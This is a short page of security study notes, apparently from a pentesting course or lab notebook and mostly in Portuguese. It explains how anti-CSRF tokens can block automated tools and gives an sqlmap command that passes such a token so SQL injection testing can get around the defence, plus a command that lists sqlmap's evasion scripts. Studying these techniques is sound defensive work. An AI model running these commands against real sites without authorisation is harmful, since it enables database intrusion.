Bypassing Web Application Protections

Uma das primeiras linhas de defesa contra o uso de ferramentas de automação é a incorporação de tokens anti-CSRF (ou seja, falsificação de solicitação entre sites) em todas as solicitações HTTP, especialmente aquelas geradas como resultado do preenchimento de formulários da web.

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Ignorar token anti-CSRF

sqlmap --list-tampers

Listar todos os scripts de violação

PreviousQuestion-2 NextQuestion-1

Last updated 12 months ago